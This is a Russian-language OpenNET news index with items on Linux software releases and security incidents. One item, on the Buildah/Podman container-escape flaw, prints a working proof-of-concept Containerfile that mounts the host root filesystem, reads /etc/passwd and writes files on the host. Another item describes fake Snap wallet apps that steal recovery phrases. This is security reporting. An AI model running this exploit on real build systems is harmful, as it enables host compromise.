The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

·19.03 В Snap Store выявлены вредоносные приложения для работы с криптокошельками (45 +6)
  В каталоге приложений Snap Store, сопровождаемом компанией Canonical и продвигаемом для использования в Ubuntu, выявлено 10 приложений, стилизованных под официальные клиенты для популярных криптовалютых кошельков, но на деле не имеющие отношения к разработчикам данных проектов и выполняющие вредоносные действия. Более того, в каталоге данные приложения снабжены меткой "Safe", которая создаёт иллюзию того, что приложение проверено и является безопасным.

Приложения опубликованы пользователем digisafe00000 под именами, подобными "exodus-build-96567", но в списке приложений выглядят как обычные криповалютные приложения Exodus, Tronlink, Polygon, Electrum, Uniswap, Ladger, Metamask, JaxxLiberty, Avalanche и Trustwallet.

В настоящее время указанные приложения уже удалены из каталога Snap Store, но почти сразу после их удаления они были размещены заново под новым пользователем codeguard0x0000 c немного изменёнными именами пакетов (например, "exodus-build-71776" и "metamask-stable28798").

Похожая активность наблюдалась в феврале и привела к краже около 9 биткойнов (примерно 500 тысяч долларов) у пользователя, установившего поддельный клиент Exodus. Так как авторы вредоносных приложений легко обходят автоматическую систему проверки публикуемых пакетов в форуме компании Canonical некоторые участники предлагают вообще запретить в Snap Store публикацию неверифицированных приложений, связанных с криптовалютой, по аналогии с тем, как в 2022 году в платформе совместной разработки SourceHut была запрещена публикация криптовалютных проектов.

Приложения представляют собой муляжи, выводящие web-страницы с внешнего сайта (например, "http://89.116.111.145:5000/public/exodus/index.html") при помощи обёртки на базе WebKit GTK, симулирующей работу обычного настольного приложения (в февральском инциденте использовались фиктивные приложения, написанные на Flutter). Из функций работает только операция импортирования ключей и восстановления кошелька, а попытки создания нового кошелька завершаются выводом ошибки.

В случае если пользователь выполнит операцию импорта уже существующего кошелька, то связанные с ним фраза восстановления ключей отправляется на сервер злоумышленников, а пользователю показывается сообщение об ошибке восстановления кошелька. Получив доступ к ключам атакующие затем выводят все средства с кошелька жертвы.

  1. Главная ссылка к новости
  2. OpenNews: В Ubuntu Snap Store выявлены вредоносные пакеты
  3. OpenNews: Компания Canonical опубликовала заявление, связанное с вредоносным ПО в Snap Store
  4. OpenNews: Компрометация NPM-репозитория Ledger привела к подстановке вредоносных изменений
  5. OpenNews: Canonical готовит вариант Ubuntu Desktop, содержащий только пакеты Snap
  6. OpenNews: Root-уязвимость в инструментарии управления пакетами Snap
Обсуждение (45 +6) | Тип: Проблемы безопасности |


·18.03 Уязвимость в Buildah и Podman, позволяющая обойти изоляцию контейнера (9 +6)
  В пакетах Buildah и Podman выявлена уязвимость (CVE-2024-1753), позволяющая получить полный доступ к файловой системе хост-окружения на стадии сборки контейнера, запускаемого с правами root. На системах с включённым SELinux доступ к хостовой ФС ограничивается режимом только чтения. Исправление пока доступно в виде патча, который несколько минут назад принят в кодовую базу Buildah.

Уязвимость вызвана тем, что при выполнении монтирования частей ФС через команду "mount --bind" во время сборки на стадии RUN, аргумент с исходным каталогом (параметр "source=") не проверяется на предмет существования в корневой ФС. Оформленный злоумышленником файл конфигурации Containerfile может использовать образ контейнера, в котором исходный каталог для монтирования оформлен в виде символической ссылки на корневую ФС. В этом случае операция монтирования приведёт к пробрасыванию внутрь контейнера корневой ФС хост-окружения, что позволит на стадии RUN получить полный доступ к файловой системе хост-окружния и организовать выход из контейнера во время сборки командами "buildah build" или "podman build".

Пример вредоносного файла Containerfile, сборка которого командой "podman build -f ~/Containerfile ." приведёт к показу содержимого /etc/passwd и созданию файлов /BIND_BREAKEOUT и /etc/BIND_BREAKOUT2 в хост-окружении:



   FROM alpine as base
   
   RUN ln -s / /rootdir
   RUN ln -s /etc /etc2

   FROM alpine

   RUN echo "ls container root"
   RUN ls -l /

   RUN echo "With exploit show host root, not the container's root, and create /BIND_BREAKOUT in / on the host"
   RUN --mount=type=bind,from=base,source=/rootdir,destination=/exploit,rw ls -l /exploit; touch /exploit/BIND_BREAKOUT; ls -l /exploit

   RUN echo "With exploit show host /etc/passwd, not the container's, and create /BIND_BREAKOUT2 in /etc on the host"
   RUN --mount=type=bind,rw,source=/etc2,destination=/etc2,from=base ls -l /; ls -l /etc2/passwd; cat /etc2/passwd; touch /etc2/BIND_BREAKOUT2; ls -l /etc2 

  1. Главная ссылка к новости
  2. OpenNews: Выпуск Podman Desktop 1.2, графического интерфейса для управления контейнерами
  3. OpenNews: Уязвимость в cgroups v1, позволяющая выйти из изолированного контейнера
  4. OpenNews: Уязвимость в подсистеме io_uring ядра Linux, позволяющая получить права root из контейнера
  5. OpenNews: В Docker Hub выявлено 1600 вредоносных образов контейнеров
  6. OpenNews: Уязвимость в runc, позволяющая выбраться из контейнеров Docker и Kubernetes
Обсуждение (9 +6) | Тип: Проблемы безопасности |


·18.03 Ошибка в Bcachefs, приводящая к разрушению ФС при использовании нескольких устройств (96 +9)
  В ядре Linux 6.7 обнаружена достаточно серьёзная ошибка в логике работы файловой системы Bcachefs, проявляющаяся в конфигурациях с несколькими устройствами хранения при использовании новых версий инструментов для создания ФС. Проблема выражается в том, что возможно создать ситуацию, когда ФС попробует обновить версию, это не будет завершено, после чего ядро может попробовать сделать версию ФС более старой - и в результате такого взаимодействия может произойти серьёзное разрушение ФС.

На данный момент всем пользователям Bcachefs с более чем одним устройством рекомендуется обновиться до ядра 6.8, потому что предложенные исправления не приняты в ветку 6.7 из-за несоответствия требованиям сопровождающих (исправления разных проблем присланы одним pull-запросом без разделения на отдельные патчи). Со временем будет реализован механизм рескана ФС для перестроения деревьев из метаданных inode, обеспечивающий восстановление даже в таких ситуациях.

  1. Главная ссылка к новости
  2. OpenNews: В ядре Linux 6.8 исправлены две серьёзные проблемы в bcachefs
  3. OpenNews: Код Bcachefs принят в основной состав ядра Linux 6.7
  4. OpenNews: В ветку ядра Linux-next добавлена реализация ФС Bcachefs
  5. OpenNews: Работа по включению Bcachefs в состав ядра Linux
Обсуждение (96 +9) | Автор: Аноним | Тип: К сведению |


·18.03 Компилятор GnuCOBOL достиг зрелости. Первый выпуск среды разработки SuperBOL (94 +16)
  Фабрис Ле Фессант (Fabrice Le Fessant) подвёл итоги 20-летной разработки свободного компилятора GnuCOBOL, позволяющего транслировать программы на языке COBOL в представление на языке Си для последующей компиляции при помощи GCC или других Си-компиляторов. По мнению Фабриса проект достиг зрелости, готовности к использованию в промышленных системах и способности конкурировать с проприетарными решениями. Из конкурентных преимуществ GnuCOBOL отмечается поддержка 19 диалектов языка COBOL, высокая производительность и кросс-платформенность, позволяющая использовать инструментарий на различных системах, включая Linux, BSD, macOS, Windows, Android и многие проприетарные Unix-подобные ОС.

По данным докладчика последнее время наблюдается активное внедрение GnuCOBOL коммерческими компаниями и банками, которые переводят написанные на COBOL бэкенды на GnuCOBOL с проприетарного компилятора Micro Focus. Отмечается, что переход на GnuCOBOL позволяет добиться повышения производительности и избавиться от привязки к одному поставщику. Например, Министерство финансов Франции недавно заменило мэйнфрейм, на котором использовалась операционная система GCOS, на решение, основанное на GnuCOBOL.

Из связанных с GnuCOBOL событий также можно упомянуть публикацию первой версии интегрированной среды разработки SuperBOL Studio, написанной на языке OCaml и распространяемой под лицензиями AGPLv3, MIT и ISC. SuperBOL Studio представляет собой расширение к редактору кода VS Code, работающее с компилятором GnuCOBOL и предназначенное для разработки, отладки и профилирования проектов на языке COBOL. SuperBOL также предоставляет реализацию сервера LSP (Language Server Protocol) для интеграции в друге IDE средств навигации, анализа и редактирования кода на языке COBOL.

В этом году языку COBOL исполнится 65 лет, при этом он остаётся одним из старейших из активно применяемых языков программирования, а также одним из лидеров по объёму написанного кода. Язык продолжает развиваться, например, в стандарте COBOL-2002 были добавлены возможности для объектно-ориентированного программирования, а в стандарте COBOL 2014 появилась поддержка спецификации вычислений с плавающей запятой IEEE-754, перегрузки методов и динамически расширяемых таблиц. Общий объём написанного на COBOL кода оценивается в 220 млрд строк, из которых 100 миллиардов до сих пор используются, в основном в финансовых учреждениях (по состоянию на 2017 год 43% банковских систем продолжали использовать COBOL, код на COBOL применялся при обработке около 80% персональных финансовых транзакций и в 95% терминалов для приёма платежей по банковским картам).

  1. Главная ссылка к новости
  2. OpenNews: Выпуск компилятора GnuCOBOL 3.2
  3. OpenNews: Энтузиастам предоставлен доступ к редакции ОС OpenVMS 9.2 для архитектуры x86-64
  4. OpenNews: Представлен gcobol, компилятор для языка COBOL на основе технологий GCC
  5. OpenNews: IBM опубликует компилятор COBOL для Linux
  6. OpenNews: Языку программирования COBOL исполняется 50 лет
Обсуждение (94 +16) | Тип: К сведению |


·18.03 Компания xAI, созданная Илоном Маском, открыла большую языковую модель Grok (97 +14)
  Компания xAI, основанная Илоном Маском и получившая около миллиарда долларов на развитие технологий, связанных с искусственным интеллектом, объявила об открытии большой языковой модели Grok, применяемой в чатботе, интегрированном в социальную сеть X (Twitter). Набор весовых коэффициентов, архитектура нейронной сети и примеры использования опубликованы под лицензией Apache 2.0. Для загрузки доступен готовый к применению архив с моделью, размером 296 ГБ (magnet).

Модель Grok предварительно обучена на большой коллекции текстовых данных, используя разработанный в xAI собственный стек обучения, и охватывает около 314 миллиардов параметров, что делает её крупнейшей из доступных открытых больших языковых моделей. Для сравнения недавно открытая Google модель Gemma насчитывает 7 млрд параметров, Sber GigaChat - 29 млрд параметров, Meta LLaMA - 65 млрд, Yandex YaLM - 100 млрд, OpenAI GPT-3.5 - 175 млрд, а лидер рынка, модель GPT-4, предположительно включает 1.76 триллиона параметров.

Открытый вариант модели Grok-1 опубликован в базовом представлении и не включает оптимизаций для определённых областей использования, таких как организация диалоговых систем. Для тестирования требуется GPU c большим объёмом памяти (каким именно не уточняется). В открытом доступе размещён статичный слепок модели, в то время как одной из особенностей развиваемого для Twitter-а чатбота Grok является динамическая адаптация к появляющемуся новому содержимому (для доступа к новым знаниям используется интеграция с платформой X/Twitter).

Построенный на базе Grok чатбот опережает GPT-3.5 в тестах на решение математических задач средней школы (GSM8k), формирование ответов на междисциплинарные вопросы (MMLU), дополнение кода на языке Python (HumanEval) и решение вузовских математических задач, описанных в формате LaTeX (MATH).

  1. Главная ссылка к новости
  2. OpenNews: Проект OpenAI открыл Transformer Debugger, отладчик для моделей машинного обучения
  3. OpenNews: ArtPrompt - атака на AI-системы, позволяющая обойти фильтры при помощи ASCII-картинок
  4. OpenNews: Google открыл AI-модель Gemma, основанную на технологиях, общих с чат-ботом Gemini
  5. OpenNews: Открыт код Jina Embedding, модели для векторного представления смысла текста
  6. OpenNews: Первый выпуск открытого AI-бота OpenAssistant, напоминающего ChatGPT
Обсуждение (97 +14) | Тип: К сведению |


·18.03 Новые сборки дистрибутива Raspberry Pi OS. Разгон плат Raspberry Pi 5 до 3.14 GHz (72 +11)
  Разработчики проекта Raspberry Pi опубликовали обновлённые сборки дистрибутива Raspberry Pi OS 2024-03-15 (Raspbian), основанного на пакетной базе Debian 12. Для плат Raspberry Pi 4/5 по умолчанию используется композитный менеджер Wayfire на базе протокола Wayland, а для остальных плат - X-сервер с оконным менеджером Openbox. Для управления звуком применяется мультимедийный сервер Pipewire. В репозитории доступно около 35 тысяч пакетов.

Для загрузки подготовлены три сборки - сокращённая (404 МБ) для серверных систем, с базовым рабочим столом (1.1 ГБ) и полная с дополнительным набором приложений (2.8 ГБ), доступные для 32- и 64-разрядных архитектур. Дополнительно сформировано обновление для старой редакции Raspberry Pi OS (Legacy), основанной на ядре Linux 6.1 и пакетной базе Debian 11.

Ключевые изменения:

  • Выполнена синхронизация с актуальной пакетной базой Debian 12.
  • Ядро Linux обновлено до версии 6.6.20.
  • Обновлены файлы с прошивками для плат Raspberry Pi.
  • Изменена логика обработки звуковых потоков - при подключении или отключении других звуковых устройств, текущее воспроизведение теперь не прерывается.
  • Улучшена работа с экранным ридером Orca, который обновлён до версии 45.
  • Удалён устаревший видеодрайвер fbturbo.
  • В штатный конфигуратор добавлена возможность настройки разрешения экрана при работе в режиме без подключённых дисплеев (headless).
  • Улучшена обработка нажатия кнопки питания на платах Raspberry Pi 5.
  • Вызываемые из панели всплывающие окна заменены на обычные окна.
  • В обработчике завершения сеанса обеспечено закрытие всех процессов пользователя при выходе.
  • Обновлён и переведён под управление systemd VNC-сервер Wayvnc, в котором повышена совместимость с различными VNC-клиентами.
  • Реализовано скрытие индикатора звука в системном лотке, в случае отсутствия звуковых устройств.
  • При выполнении операций drag-and-drop обеспечено отображение иного курсора мыши.
  • В raspi-config добавлена поддержка обновления EEPROM.
  • Ускорено открытие меню для Bluetooth и управления сетью.
  • Улучшено отображение виджетов при использовании тёмной темы оформления.
  • Повышена совместимость с альтернативными оконными менеджерами
  • Обновлены браузеры Chromium 122.0.6261.89 и Firefox 123.

Дополнительно можно отметить обеспечение возможности разгона плат Raspberry Pi 5 через повышение тактовой частоты с CPU с 2.4 GHz до 3.14 GHz. Изначально прошивка не позволяла повышать частоту выше 3 GHz, но в неофициально выпущенном обновлении прошивки данное ограничение убрано и на плате теперь можно выставлять значения выше 3 GHz. Судя по отзывам пользователей стабильная работа при стресс-тестировании обеспечивается при выставлении частоты 3.14 GHz и использовании активного охлаждения. При более высоких значениях начинают возникать сбои.

  1. Главная ссылка к новости
  2. OpenNews: Подготовлена редакция дистрибутива MX Linux для плат Raspberry Pi
  3. OpenNews: Выпуск дистрибутива Raspberry Pi OS, переведённого на Debian 12, PipeWire и Wayland
  4. OpenNews: Анонсирована плата Raspberry Pi 5
  5. OpenNews: Дистрибутив Ubuntu MATE сформировал сборки для плат Raspberry Pi
  6. OpenNews: Доступен Armbian 24.2, дистрибутив для одноплатных компьютеров
Обсуждение (72 +11) | Тип: Программы |


·17.03 Релиз браузерного движка WebKitGTK 2.44.0 и web-браузера Epiphany 46 (52 +5)
  Представлен выпуск новой стабильной ветки WebKitGTK 2.44.0, порта браузерного движка WebKit для платформы GTK. WebKitGTK позволяет использовать все возможности WebKit через GNOME-ориентированный программный интерфейс на основе GObject и может применяться для интеграции средств обработки web-контента в любые приложения, от использования в специализированных HTML/CSS-парсерах, до создания полнофункциональных web-браузеров. Из известных проектов, использующих WebKitGTK, можно отметить штатный браузер GNOME (Epiphany). Ранее WebKitGTK применялся в браузере Midori, но после перехода проекта в руки Astian Foundation старый вариант Midori на WebKitGTK был заброшен и создан принципиально другой продукт с тем же названием Midori.

Ключевые изменения:

  • Прекращена поддержка движков отрисовки, использующих X11 и WPE. Для отрисовки задействован механизм, использующий разделяемые буферы DMA-BUF.
  • При отрисовке улучшена синхронизация с кадровым гасящим импульсом (vblank) для исключения появления разрывов при выводе (tearing).
  • Из процесса формирования интерфейса, использующего GTK4, обеспечен доступ к компонентам DOM для людей с ограниченными возможностями (accessibility).
  • Для работы клавиатурных комбинаций на сайтах прекращена повторная подстановка событий нажатия клавиш в GTK4.
  • Налажено определение геймпадов.



На базе WebKitGTK 2.44.0 сформирован выпуск браузера GNOME Web 46 (Epiphany). Основные изменения:

Обсуждение (52 +5) | Тип: Программы |


·17.03 Определение сеансов OpenVPN в транзитном трафике (68 +16)
  Группа исследователей из Мичиганского университета опубликовала результаты исследования возможности идентификации (VPN Fingerprinting) соединений к серверам на базе OpenVPN при мониторинге транзитного трафика. В итоге было выявлено три способа идентификации протокола OpenVPN среди других сетевых пакетов, которые могут использоваться в системах инспектирования трафика для блокирования виртуальных сетей на базе OpenVPN.

Тестирование предложенных методов в сети интернет-провайдера Merit, насчитывающего более миллиона пользователей, показало возможность идентификации 85% OpenVPN-сеансов при незначительном уровне ложных срабатываний. Для проверки был подготовлен инструментарий, который вначале в пассивном режиме на лету определял трафик OpenVPN, а затем удостоверяется в корректности результата через активную проверку сервера. На созданный исследователями анализатор был отзеркалирован поток трафика, интенсивностью примерно 20 Gbps.

В ходе эксперимента анализатор смог успешно определить 1718 из 2000 тестовых OpenVPN-соединений, установленных подставным клиентом, на котором было использовано 40 различных типовых конфигураций OpenVPN (метод успешно сработал для 39 из 40 конфигураций). Кроме того, за восемь дней проведения эксперимента в транзитном трафике было выявлено 3638 сеансов OpenVPN, из которых было подтверждено 3245 сеанса. Отмечается, что верхняя граница ложных срабатываний в предложенном методе на три порядка ниже, чем в ранее предлагавшихся методах, основанных на применении машинного обучения.

Отдельно была оценена работа методов защиты от отслеживания трафика OpenVPN в коммерческих сервисах - из 41 протестированного VPN-сервиса, использующего методы скрытия трафика OpenVPN, трафик удалось идентифицировать в 34 случаях. Сервисы, которые не удалось обнаружить, помимо OpenVPN использовали дополнительные слои для скрытия трафика (например, пробрасывание OpenVPN-трафика через дополнительный шифрованный туннель). В большинстве успешно определённых сервисов использовалось искажение трафика при помощи операции XOR, дополнительные слои обфускации без должного случайного дополнения трафика или наличие необфусцированных OpenVPN-служб на том же сервере.

Задействованные способы идентификации основываются на привязке к специфичным для OpenVPN шаблонам в незашифрованных заголовках пакетов, размеру ACK-пакетов и ответам сервера. В первом случае, в качестве объекта для идентификации на стадии согласования соединения может использоваться привязка к полю "opcode" в заголовке пакетов, которое принимает фиксированный диапазон значений и определённым образом меняется в зависимости от стадии установки соединения. Идентификация сводится в выявлению определённой последовательности изменения opcode в первых N-пакетах потока.

Второй способ основывается на том, что ACK-пакеты применяются в OpenVPN только на стадии согласования соединения и при этом имеют специфичный размер. Идентификация основывается на том, что ACK-пакеты заданного размера встречаются только в определённых частях сеанса (например, при использовании OpenVPN первый ACK-пакет обычно является третьим пакетом с данными, переданным в сеансе).

Третий метод является активной проверкой и обусловлен тем, что в ответ на запрос сброса соединения сервер OpenVPN отправляет определённый RST-пакет (проверка не работает при использовании режима "tls-auth" так как OpenVPN-сервер при нём игнорирует запросы от клиентов, не аутентифицированных через TLS).

  1. Главная ссылка к новости
  2. OpenNews: Доступен OpenVPN 2.6.0
  3. OpenNews: Уязвимости в OpenVPN и SoftEther VPN
  4. OpenNews: Уязвимость, позволяющая вклиниваться в TCP-соединения, осуществляемые через VPN-туннели
  5. OpenNews: NordVPN открыл код Linux-клиента и библиотек с реализацией MeshNet
  6. OpenNews: Серия атак TunnelCrack, направленных на перехват трафика VPN
Обсуждение (68 +16) | Тип: Проблемы безопасности |


·16.03 Rocky Linux, Oracle и SUSE обеспечат дальнейшее сопровождение ядра Linux 4.14 (120 +19)
  Ассоциация OpenELA (Open Enterprise Linux Association), в прошлом году образованная компаниями CIQ (Rocky Linux), Oracle и SUSE для объединения усилий по обеспечению совместимости с RHEL, представила проект kernel-lts, в рамках которого обеспечит дополнительное сопровождения для некоторых устаревших LTS-веток ядра, после прекращения их официальной поддержки.

Первым ядром, для которого будет предоставлена дополнительная поддержка станет ветка 4.14, которая была опубликована в ноябре 2017 года и сопровождалась 6 лет. В январе основная команда разработчиков ядра прекратила сопровождение данной ветки. Силами OpenELA сопровождение возобновлено и обновления для ядра 4.14 будут выпускаться как минимум до декабря 2024 года. После финального выпуска ядра Linux 4.14.336 командой OpenELA уже выпущены расширенные обновления 4.14.337-openela, 4.14.338-openela и 4.14.339-openela.

Осуществляемое организацией OpenELA сопровождение будет производиться с соблюдением тех же правил и процессов, что применяются для обычных стабильных LTS-ядер. Никаких дополнительных ограничений, таких как привязка к определённому оборудованию или продуктам, вводиться не будет. Обновления будут выпускаться на основе работы по отслеживанию исправлений из актуальных веток ядра и их переносу в сопровождаемые расширенные LTS-ветки.

Кроме расширенного сопровождения LTS-веток ядра ассоциация OpenELA занимается поддержанием репозитория с пакетами, который можно использовать в качестве основы для создания дистрибутивов, полностью бинарно совместимых с Red Hat Enterprise Linux, идентичных по поведению (на уровне ошибок) с RHEL и пригодных для использования в качестве замены RHEL. Репозиторий поддерживается совместными усилиями команд разработчиков RHEL-совместимых дистрибутивов Rocky Linux, Oracle Linux и SUSE Liberty Linux, и включает пакеты, необходимые для формирования дистрибутивов, совместимых с ветками RHEL 8 и 9 (в планах RHEL 7). Репозиторий OpenELA занял место репозитория git.centos.org, поддержание которого было прекращено компанией Red Hat.

Разработчиками ядра продолжается сопровождение следующих longterm-веток ядра Linux:

  • 6.6 - до декабря 2026 г. (используется в Ubuntu 24.04).
  • 6.1 - до декабря 2026 г. + поддержка в рамках SLTS (используется в Debian 12 и main ветке OpenWRT).
  • 5.15 - до октября 2026 г. (используется в Ubuntu 22.04, Oracle Unbreakable Enterprise Kernel 7 и OpenWRT 23.05).
  • 5.10 - до декабря 2026 г. + поддержка в рамках SLTS (используется в Debian 11, Android 12 и OpenWRT 22).
  • 5.4 - до декабря 2025 г. (используется в Ubuntu 20.04 LTS и в Oracle Unbreakable Enterprise Kernel 6)
  • 4.19 - до декабря 2024 г. + поддержка в рамках SLTS (используется в Debian 10 и в Android 10).

Отдельно на базе ядер 4.4, 4.19, 5.10 и 6.1 организацией Linux Foundation предоставляются ветки SLTS (Super Long Term Support), которые сопровождается отдельно и поддерживаются 10-20 лет. Сопровождение SLTS-веток осуществляется в рамках проекта Civil Infrastructure Platform (CIP), в котором участвуют такие компании, как Toshiba, Siemens, Renesas, Bosch, Hitachi и MOXA, а также вовлечены мэйнтейнеры LTS-веток основного ядра, разработчики Debian и создатели проекта KernelCI. Ядра SLTS ориентированы на применение в технических системах гражданской инфраструктуры и в важных промышленных системах.

  1. Главная ссылка к новости
  2. OpenNews: Прекращение поддержки LTS-ядра Linux 4.14
  3. OpenNews: Релиз ядра Linux 4.14
  4. OpenNews: Опубликован репозиторий OpenELA для создания дистрибутивов, совместимых с RHEL
  5. OpenNews: Rocky Linux, Oracle и SUSE создали совместный репозиторий для RHEL-совместимых дистрибутивов
  6. OpenNews: Организация Linux Foundation выпустила LTSI-ветку на базе ядра Linux 4.14
Обсуждение (120 +19) | Тип: К сведению |


·16.03 Выпуск библиотеки Libadwaita 1.5 для создания интерфейсов в стиле GNOME (143 +10)
  Проект GNOME опубликовал выпуск библиотеки Libadwaita 1.5, включающей набор компонентов для стилевого оформления интерфейса пользователя, соответствующего рекомендациям GNOME HIG (Human Interface Guidelines). Библиотека включает в себя готовые виджеты и объекты для построения приложений, соответствующих общему стилю GNOME, интерфейс которых может адаптивно подстраиваться под экраны любого размера. Код библиотеки написан на языке Си и распространяется под лицензией LGPL 2.1+.

Библиотека libadwaita используется в сочетании с GTK4 и включает компоненты используемой в GNOME темы оформления Adwaita, которые были вынесены из GTK в отдельную библиотеку. Вынос элементов визуального оформления GNOME в отдельную библиотеку позволяет развивать необходимые для GNOME изменения отдельно от GTK, что даёт возможность разработчикам GTK сосредоточиться на базовых вещах, а разработчикам GNOME более быстро и гибко продвигать необходимые для себя изменения стилевого оформления, не затрагивая сам GTK.

В библиотеку входят типовые виджеты, охватывающих различные элементы интерфейса, такие как списки, панели, блоки редактирования, кнопки, вкладки, формы поиска, диалоговые окна и т.п. Предложенные виджеты позволяют создавать универсальные интерфейсы, которые органично функционируют как на крупных экранах ПК и ноутбуков, так и на небольших сенсорных экранах смартфонов. Интерфейс приложений динамически меняется в зависимости от размера экрана и доступных устройств ввода. Библиотека также включает набор стилей Adwaita, приводящих внешний вид в соответствие с рекомендациями GNOME, без необходимости выполнения ручной адаптации.

Основным изменением в libadwaita 1.5 стала переработка адаптивных виджетов для создания диалоговых окон, подстраивающихся под размер видимой области. В отличие от традиционных диалогов, которые размещаются в отдельных окнах, новые диалоги формируются на стороне клиента, отрисовываются внутри существующих окон и не могут выходить за пределы родительского окна. Подобный подход упрощает создание универсальных диалогов, сочетаемых с интерфейсами для мобильных и настольных систем, а также предоставляет дополнительные возможности для управления диалогами (например, не нужно отслеживать выход за границу окна, можно выбирать поведение в отношении кнопок закрытия, обеспечивается автоматическое развёртывание на весь экран в мобильных версиях приложений, учитывается стиль текущего окна, а не системы, при затемнении диалога).

В дальнейшем планируется реализовать ещё один вариант подобных диалогов, привязанных не к окнам, а ко вкладкам внутри окна, что может быть востребовано в таких приложениях, как браузеры для того, чтобы связанные со вкладкой диалоги не перекрывали основное окно при переключении между вкладками.

Для мобильных устройств реализована поддержка размещения диалогов в форме листов, закреплённых в нижней части экрана (bottom sheets), а не в форме листов, выровненных по центру. Прикреплённые к нижней части диалоги избавляют пользователей от путаницы с закрытием окон - в подобных диалогах часть родительского окна остаётся видимой и кнопки закрытия родительского окна и самого диалога явно разделены, поэтому их теперь трудно спутать.

Управление новыми диалогами производится при помощи класса AdwDialog, работа с которым в большинстве ситуаций походит на использование класса GtkWindow, а различия сводятся к операциям отображения и закрытию. Например, свойство ":transient-for" заменено на параметр в функции adw_dialog_present(), добавлен новый сигнал "::close-attempt", изменена обработка параметра ":can-close". Вместо классов AdwPreferencesWindow, AdwAboutWindow и AdwMessageDialog с новыми диалогами предложено использовать классы AdwPreferencesDialog, AdwAboutDialog и AdwAlertDialog.

Диалоги, которые не имеют родительского окна, по-прежнему будут обрабатываться в форме отдельных окон. Как окна также будут функционировать диалоги, родительские окна которых не могут быть использованы для размещения диалогов, например, если они не допускают изменения размера или для них отсутствуют классы AdwWindow и AdwApplicationWindow.

Не связанные с переработкой диалогов изменения в Libadwaita 1.5:

  • В класс AdwEntryRow добавлено свойство ":text-length" для ограничения размера текста в поле ввода.
  • В класс AdwMessageDialog добавлен метод remove_response().
  • В класс AdwBreakpointBin, позволяющий менять интерфейс пользователя произвольным образом в зависимости от размера окна, добавлена возможность программного удаления точек останова.
  • В класс AdwSwipeTracker добавлен флаг ":allow-window-handle", допускающий пролистывание поверх верхней панели (используется в листах, прикреплённых к нижнему краю).
  • Повышена яркость цветов, используемых при затенении окон при тёмном стиле оформления.

  1. Главная ссылка к новости
  2. OpenNews: Доступен графический тулкит GTK 4.14 с новыми движками для OpenGL и Vulkan
  3. OpenNews: В звуковом редакторе Ardour 8.4 создано собственное ответвление GTK2
  4. OpenNews: Для GNOME предложены изменения, нацеленные на прекращение поддержки X11
  5. OpenNews: Опубликовано пользовательское окружение GNOME 45
  6. OpenNews: Выпуск библиотеки Libadwaita 1.4 для создания интерфейсов в стиле GNOME
Обсуждение (143 +10) | Тип: Программы |


·15.03 Первый выпуск дистрибутива TileOS (97 +11)
  Доступен выпуск дистрибутива TileOS 1.0 "T-Rex", построенного на пакетной базе Debian и предлагающего рабочий стол, использующий мозаичные оконные менеджеры. TileOS преследует те же цели, что и дистрибутив Ubuntu Sway Remix (развивается тем же автором), предлагая готовый к использованию интерфейс, не требующий дополнительной настройки и ориентированный как на опытных пользователей Linux, так и на новичков, желающих попробовать окружение мозаичных оконных менеджеров, не тратя большое количество времени на их настройку.

Однако, в отличии от Ubuntu Sway Remix, TileOS гораздо более открыт для различных изменений и кастомизаций, а также избавлен от каких-либо потенциальных проблем с авторскими правами (Ubuntu Sway Remix использует зарегистрированные товарные знаки Canonical, но официального ответа по поводу включения дистрибутива в официальное семейство Ubuntu до сих пор не получено). Для загрузки подготовлены сборки для архитектуры amd64 (в будущем планируется обеспечить поддержку arm64, в частности плат Raspberry Pi). Исходный код компонентов TileOS доступен на GitLab.

Основное внимание в TileOS уделяется оконным менеджерам, использующим протокол Wayland. Официально представлены редакции с рабочими столами Sway и River, в разработке находятся редакции с SwayFX (форк Sway, дополненный различными эффектами рабочего стола) и Qtile. Дистрибутив использует пакетную базу Debian Stable, однако из тестовой ветки переносятся различные улучшения, более свежие версии некоторого ПО и графических драйверов. Помимо этого, в состав включён ряд исправлений, оптимизирующих работу дисковой подсистемы и памяти, а также перенесены некоторые улучшения из Ubuntu, например монтирование дисков в файловом менеджере без запроса пароля, и другие.

Ключевые особенности TileOS:

  • Ядро Linux 6.6.15 с улучшенным временем отклика (опция CONFIG_HZ=1000, в Debian используется CONFIG_HZ=300).
  • Набор открытых видеодрайверов, Mesa 23.2.1 и Xwayland 23.2.2.
  • По умолчанию задействован механизм Zram, с использованием алгоритма сжатия zstd.
  • Предустановлено большое число несвободных драйверов и прошивок (firmware), что существенно расширяет поддержку различного оборудования.
  • По умолчанию подключены репозитории с дополнительным ПО, таким как VirtualBox, Visual Studio Code, Librewolf, OnlyOffice и Brave.
  • Реализована возможность выбора дополнительного ПО в установщике Calamares.
  • В качестве реализации системной шины D-Bus задействован D-Bus Broker.
  • В качестве звукового сервера задействован PipeWire.
  • Управление пользовательскими сеансами осуществляется средствами systemd, что позволяет корректно завершать запущенные приложения и компоненты при перезагрузке, выключении или выходе из системы, а также обеспечить корректную обработку автозапуска приложений.
  • В качестве демона OOM Killer в редакции Sway задействован systemd-oomd. В остальных редакциях используется EarlyOOM.
  • Для оформления приложений задействована единая тема Catppuccin, использующая мягкие пастельные цвета.

Особенности редакции Sway:

  • Рабочий стол развивается параллельно с дистрибутивом Ubuntu Sway Remix, обеспечивается взаимный перенос тех или иных изменений.
  • Задействованы многие утилиты из проекта NWG-Shell, такие как скрипт автоматической раскладки окон Autotiling, полноэкранное меню приложений nwg-drawer, утилита для настройки параметров дисплея nwg-displays, утилита для настройки внешнего вида nwg-look, менеджер сеансов nwg-bar и nwg-wrapper, позволяющий выводить на рабочий стол содержимое любых скриптов (через него реализована подсказка по используемым в дистрибутиве горячим клавишам).
  • Предустановлен минимальный набор компонентов, включающий файловый менеджер PcmanFM-Qt, текстовый редактор Pluma, эмулятор терминала Alacritty, архиватор Engrampa и другие. Дополнительное ПО предлагается выбрать на этапе установки системы, либо установить непосредственно после установки системы

Особенности редакции River

  • Задействован динамический оконный менеджер River, написанный на языке zig и вобравший себя многое из DWM, Awesome и Bwpwm. River отличается простотой настройки (файл конфигурации — обычный shell-скрипт, последовательно выполняющий команды для шины IPC riverctl), широкой гибкостью и меньшим потреблением ресурсов, чем Sway. Поскольку River находится в стадии активной разработки, и пока значительно уступает в функциональном плане Sway, редакция TileOS River носит экспериментальный характер.
  • Как и в редакции Sway, задействованы компоненты проекта NWG-Shell, кроме тех, что явно не поддерживают River (например вместо nwg-displays используется wdisplays).

  1. Главная ссылка к новости
  2. OpenNews: Релиз пользовательского окружения Sway 1.9, использующего Wayland
  3. OpenNews: Выпуск дистрибутива Ubuntu Sway Remix 23.10
